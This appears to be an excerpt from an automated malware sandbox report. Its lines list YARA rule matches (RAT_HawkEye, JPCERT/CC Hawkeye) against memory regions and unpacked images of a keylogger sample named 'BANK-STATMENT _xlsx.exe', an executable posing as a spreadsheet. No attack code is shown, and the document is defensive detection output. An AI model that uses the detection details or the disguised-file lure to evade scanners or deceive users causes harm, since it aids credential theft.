                Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.932841604.0000000002F34000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
